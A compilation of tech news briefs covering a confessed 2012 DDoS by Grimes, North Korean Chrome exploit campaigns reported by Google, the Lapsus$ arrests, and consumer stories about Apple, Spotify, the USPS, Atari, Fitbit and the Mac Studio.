Grimes claims responsibility for 2012 hack of culture blog Hipster Runoff

Grimes’ connections to hacking extend beyond a Cyberpunk 2077 cameo, apparently. Cybersecurity expert Jackie Singh and Pitchfork report the electropop star (aka Claire Boucher) confessed to hacking the culture blog Hipster Runoff in a Vanity Fairinterview. She said she coordinated a distributed denial of service attack against the site in 2012 after its anonymous author Carles posted an allegedly “mean” story including a photo of her kissing a friend at a party.

At the time, Carles told Motherboard there was evidence of “foul play” on the server, including a disk crash and sabotaged backups. Grimes said she and her fellow, still-anonymous perpetrator (from the games industry) “basically blackmail[ed]” Carles into removing the story before they would let him restore Hipster Runoff.

The admission might be more than just an interesting anecdote. As Pitchfork explains, DDoS attacks have long been illegal in both the US and Grimes’ home country of Canada — both nations can sentence culprits to as many as 10 years in prison. Blackmail, of course, has been illegal for longer. Law enforcement could theoretically charge Boucher and her accomplice based on the interview. Current Hipster Runoff owner Trevor McFedries has asked Twitter followers if anyone has a backup of the site under Carles, so the story might not be over yet.

Meghan Markle’s first Spotify podcast series will confront female stereotypes

Meghan Markle hasn’t wasted much time setting expectations for her first Spotify podcast. As The Hollywood Reporternotes, Spotify has revealed that the Duchess of Sussex’s initial series is Archetypes, an exploration of the “labels that try to hold women back.” The teaser indicates Markle will hold “uncensored” discussions with historians and other experts as they explore the origins of stereotypes and define female lives.

Spotify had already announced that Archewell Audio, the production company founded by Markle and Prince Harry, would release their first full podcast series in the summer. Until now, the duo had only released a one-episode holiday special.

The announcement helps wind down a tense chapter for Spotify. The streaming service landed a deal with Harry and Meghan in December 2020, but the two quickly grew concerned about Spotify’s apparent tolerance of COVID-19 misinformation. The couple said they’d raised issues starting in April 2021, and those worries only became more prominent when Neil Young and other creators started pulling or pausing content in protest to Spotify’s apparent comfort with Joe Rogan allowing false medical claims on his show. Harry and Meghan had a change of heart after they met with Spotify to discuss and shape its anti-misinformation strategy.

This doesn’t end the complaints about Spotify’s approach to bogus claims. Even one of its own podcasts, Science VS, fought the service by fact-checking misinformation from other productions. However, it does give Spotify a chance to focus more on promoting exclusives and less on damage control.

Google says it thwarted North Korean cyberattacks in early 2022

Google’s Threat Analysis Group announced on Thursday that it had discovered a pair of North Korean hacking cadres going by the monikers Operation Dream Job and Operation AppleJeus in February that were leveraging a remote code execution exploit in the Chrome web browser. 

The blackhatters reportedly targeted the US news media, IT, crypto and fintech industries, with evidence of their attacks going back as far as January 4th, 2022, though the Threat Analysis Group notes that organizations outside the US could have been targets as well.

“We suspect that these groups work for the same entity with a shared supply chain, hence the use of the same exploit kit, but each operate with a different mission set and deploy different techniques,” the Google team wrote on Thursday. “It is possible that other North Korean government-backed attackers have access to the same exploit kit.”

Operation Dream Job targeted 250 people across 10 companies with fraudulent job offers from the likes of Disney and Oracle sent from accounts spoofed to look like they came from Indeed or ZipRecruiter. Clicking on the link would launch a hidden iframe that would trigger the exploit. 

Operation AppleJeus, on the other hand targeted more than 85 users in the cryptocurrency and fintech industries using the same exploit kit. That effort involved “compromising at least two legitimate fintech company websites and hosting hidden iframes to serve the exploit kit to visitors,” Google’s security researchers found. “In other cases, we observed fake websites — already set up to distribute trojanized cryptocurrency applications — hosting iframes and pointing their visitors to the exploit kit.”

“The kit initially serves some heavily obfuscated javascript used to fingerprint the target system,” the team said. “This script collected all available client information such as the user-agent, resolution, etc. and then sent it back to the exploitation server. If a set of unknown requirements were met, the client would be served a Chrome RCE exploit and some additional javascript. If the RCE was successful, the javascript would request the next stage referenced within the script as ‘SBX,’ a common acronym for Sandbox Escape.”

The Google security group discovered the activity on February 10th and had patched it by February 14th. The company has added all identified websites and domains to its Safe Browsing database as well as notified all of the targeted Gmail and Workspace users about the attempts. 

Apple is reportedly planning an iPhone hardware subscription service

Apple’s iPhones and other devices have become increasingly expensive, and the company may be using alternative sales models to help soften the blow. Bloombergsources claim Apple is developing a subscription service for the iPhone and other hardware. Akin to the iPhone upgrade program, you’d pay a monthly fee rather than an up-front cost or financed instalments. You’d “likely” manage the subscription through your Apple account.

Full details of what would be included weren’t available as of this writing, but the service would include regular upgrades and launch in either late 2022 or early 2023. Pricing is also unknown. Apple’s current upgrade program currently requires $35 or more per month to get both yearly iPhone upgrades and continuous AppleCare+ coverage.

Apple has already declined to comment. The company hasn’t been shy about moving toward subscriptions, mind you. Digital services like Apple Music, TV+ and Fitness+ have accounted for a rapidly growing slice of the firm’s revenue, and have helped soften the ups and downs of seasonal sales cycles as well as a relatively stagnant phone market. A broader hardware subscription offering would expand this strategy — Apple could count on a steadier revenue stream, particularly from customers who’d otherwise wait longer to replace their gadgets.

The USPS is doubling its order of next-gen electric mail trucks

Despite previously saying that it would only order 5,000 all-electric models of its next-gen postal truck, today the USPS announced that it’s doubling that figure to just over 10,000. 

Produced by Oshkosh Defense, the NGDV (Next Generation Delivery Vehicle) is slated to become the new workhorse of the USPS, with the first batch of trucks scheduled to hit the road sometime in 2023. And as part of the USPS’ efforts to upgrade its aging fleet, the service placed an initial order of 50,000 vehicles featuring a mix of gas and electric-powered trucks.

However, after learning that only 10 percent of those trucks would be EVs, the EPA and the Biden Administration requested the USPS to reconsider the distribution of its order. So now the USPS has increased the number of new electric postal trucks on order to 10,019 BEVs, which is a significant improvement, but still in the minority compared to gas-powered models. 

Postmaster Lous Dejoy says “Today’s order demonstrates, as we have said all along, that the Postal Service is fully committed to the inclusion of electric vehicles as a significant part of our delivery fleet even though the investment will cost more than an internal combustion engine vehicle. That said, as we have also stated repeatedly, we must make fiscally prudent decisions in the needed introduction of a new vehicle fleet. We will continue to look for opportunities to increase the electrification of our delivery fleet in a responsible manner, consistent with our operating strategy, the deployment of appropriate infrastructure, and our financial condition, which we expect to continue to improve as we pursue our plan.”

Upgrades on the NGDV include air conditioning, built-in 360-degree cameras, better braking and traction control, and much improved safety thanks to things like air bags and a new collision avoidance system. That said, with the USPS having over 190,000 trucks currently in service, this initial 50,000 order only represents a fraction of what the service will need to fully modernize its fleet. So while the mix of gas and electric NGDVs might not be ideal right now, there should be room to expand electrification in the future. 

Atari collaborates with Cariuma to create a 50th anniversary sneaker collection

Atari is celebrating its 50th anniversary with some smoking new kicks. The venerated gaming company announced on Thursday that it is collaborating with sustainable footwear maker, Cariuma. The collection will feature five designs atop two of Cariuma’s most popular sneaker styles, the Chuck Taylor-esque OCA Low and the Vans-adjacent Catiba Pro.

The Catiba Pros retail for $98 and will come in black and white variants while the $89 OCA Lows will include a red color scheme in addition to the black and white. Though both prominently feature the Atari logo, the two styles will be discernible from a distance given the Lows sport the words “Game On” opposed to the Pro’s depiction of a pixelated Cariuma logo. The sneakers are constructed from eco-friendly materials including GOTS-certified organic cotton canvas, natural rubber and recycled plastics. What’s more, for every pair purchased, Atari and Cariuma will plant two trees in the Amazon rainforest. 

This isn’t the first time that the worlds of fashion and gaming have collided, Playstation has released branded footwear through Nike and Adidas has previously paired with Xbox — there was even an Atari speaker hat released not too long ago. The Atari x Cariuma collection is available online at Cariuma.com

Google seeks FDA approval for Fitbit’s passive heart rate monitoring tech

Following a large-scale virtual health study, Google has submitted Fitbit’s passive heart rate monitoring algorithm for review by the US Food and Drug Administration. 

The study, which went live in May 2020, was open to all US Fitbit users over the age of 22, and it was designed to test how accurately the device could detect atrial fibrillation, or irregular heart rhythm. The system uses photoplethysmography to passively track the blood flow in a user’s wrist and determine if there are any concerning irregularities. Google said its algorithm correctly identified undiagnosed AFib 98 percent of the time in this study, and the company presented its results to the American Heart Association at its most recent meeting.

Fitbit’s Sense Smartwatch was approved by the FDA in 2020 for its ability to assess AFib using built-in electrocardiogram technology. This method requires active input from the user, while the PPG system heading to the FDA today runs in the background.

In addition to the Fitbit FDA news, Google is rolling out a few other healthcare-related tools. Google Search in the US will soon show available appointment slots with local doctors and clinics when looking for care, with an emphasis on the CVS MinuteClinic.

“While we’re still in the early stages of rolling this feature out, we’re working with partners, including MinuteClinic at CVS and other scheduling solution providers,” Google chief health officer Dr. Karen DeSalvo said. “We hope to expand features, functionality and our network of partners so we can make it easier for people to get the care they need.”

Google is also rolling out “health source information panels” and “health content shelves” on YouTube videos in Japan, Brazil and India this week, in an effort to highlight credible information from legitimate sources.

London police arrest seven people over Lapsus$ hacks

Authorities are quickly cracking down on the Lapsus$ hacking group that allegedly compromised Microsoft and Okta. BBC Newsreports City of London Police have arrested seven people aged 16 to 21 over connections to Lapsus$. The police didn’t name the older people facing charges, but said they’d been released “under investigation.”

More details appear to have surfaced around one of the leaders. A 16-year-old Oxford boy known as “Breachbase” or “White” has supposedly made the equivalent of $14 million in Bitcoin up to this point, and was apparently outed after business partners doxxed him following a dispute. Researchers have been following him for almost a year, Bloombergadded. The teen made multiple mistakes that helped researches trail his activity across online accounts.

Lapsus$ claimed to have obtained 37GB in Microsoft source code for projects like Bing, Cortana and mobile apps. They also tried to compromise Okta’s customer support in January and posted images they said showed the company’s internal systems. Microsoft acknowledged that the hackers had limited access to its network, while Okta indicated there was no hostile action beyond the January incident.

The arrests won’t necessarily put a stop to Lapsus$ when the group is believed to call South America its home. They may chill the organization’s activity and rapidly growing buzz, though. Lapsus$ has quickly garnered attention due to major targets like Microsoft, and its Telegram channel now has 47,000 members — the busts won’t exactly encourage copycat attacks.

iFixit teardown offers a peek inside the Mac Studio

The Mac Studio’s storage isn’t quite as set in stone as you might think, although you’ll want to keep your expectations in check. iFixit has conducted a teardown of Apple’s pro desktop that suggests you can replace the SSD module in limited circumstances. The company managed to swap the drive with one of the same capacity (from another Mac Studio) by using Apple’s Configurator app to perform a DFU restore.

You can’t add a second module in the base model, and it’s unclear if higher capacities will work. However, this does suggest you could revive the Mac Studio with a spare module, if Apple ever makes them available through its self-repair program.

It’s no surprise you can’t replace the RAM, which is built into the M1 Max or Ultra chip. The Mac Studio is easier to access than you might think, though, with Torx screws (albeit a huge number of them) and removable ports. And yes, the cooling system in the Mac Studio is as massive as you’d heard. The fans are larger than on other Macs, iFixit said, and the aluminum heatsink in the base model is six times heavier than the one in the Mac mini.

The teardown led iFixit to give the Mac Studio a 6/10 score for repairability. The non-upgradeable components are the largest concerns, but the repair shop was also concerned about buried fans and the potential for dust build-up. You’re probably not buying this system expecting to treat it like a Mac Pro or many PC towers, but those limitations are worth noting if you intend to maintain the Studio yourself.